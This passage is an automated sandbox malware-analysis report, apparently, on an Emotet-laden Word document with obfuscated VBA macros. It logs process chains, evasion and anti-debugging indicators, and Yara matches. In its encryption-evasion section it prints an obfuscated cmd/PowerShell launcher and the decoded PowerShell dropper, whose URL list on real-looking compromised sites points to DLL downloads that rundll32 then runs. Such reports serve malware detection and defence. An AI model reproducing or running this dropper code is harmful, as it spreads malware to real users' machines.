Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2087459336.0000000002290000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: N00048481397007.doc Stream path 'Macros/VBA/Gp0t5ucwnkng7fi' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gp0t5ucwnkng7fi Name: Gp0t5ucwnkng7fi
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Uses code obfuscation techniques (call, push, ret)

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2086923820.0000000000373000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF3278 mov eax, dword ptr fs:[00000030h] 7_2_01FF3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002327EC mov eax, dword ptr fs:[00000030h] 7_2_002327EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF3278 mov eax, dword ptr fs:[00000030h] 8_2_01FF3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C27EC mov eax, dword ptr fs:[00000030h] 8_2_001C27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A27EC mov eax, dword ptr fs:[00000030h] 9_2_001A27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005927EC mov eax, dword ptr fs:[00000030h] 10_2_005927EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00403278 mov eax, dword ptr fs:[00000030h] 11_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001A27EC mov eax, dword ptr fs:[00000030h] 11_2_001A27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00403278 mov eax, dword ptr fs:[00000030h] 12_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002027EC mov eax, dword ptr fs:[00000030h] 12_2_002027EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_01FF27EC mov eax, dword ptr fs:[00000030h] 13_2_01FF27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E27EC mov eax, dword ptr fs:[00000030h] 14_2_001E27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002E27EC mov eax, dword ptr fs:[00000030h] 15_2_002E27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00363278 mov eax, dword ptr fs:[00000030h] 16_2_00363278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_004827EC mov eax, dword ptr fs:[00000030h] 16_2_004827EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_00373278 mov eax, dword ptr fs:[00000030h] 17_2_00373278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_004327EC mov eax, dword ptr fs:[00000030h] 17_2_004327EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_001B27EC mov eax, dword ptr fs:[00000030h] 18_2_001B27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_001927EC mov eax, dword ptr fs:[00000030h] 19_2_001927EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00273278 mov eax, dword ptr fs:[00000030h] 20_2_00273278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_001C27EC mov eax, dword ptr fs:[00000030h] 20_2_001C27EC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106050192.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2094977205.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2112358022.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2091794029.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2097666740.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2095245962.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2099840618.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2090614258.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2091834475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106091733.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2103352962.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2103466457.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2088248938.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2099966335.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107140273.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2110865769.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2109908285.0000000000460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2112047074.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2095687942.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2111384488.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3149905942.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 17.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
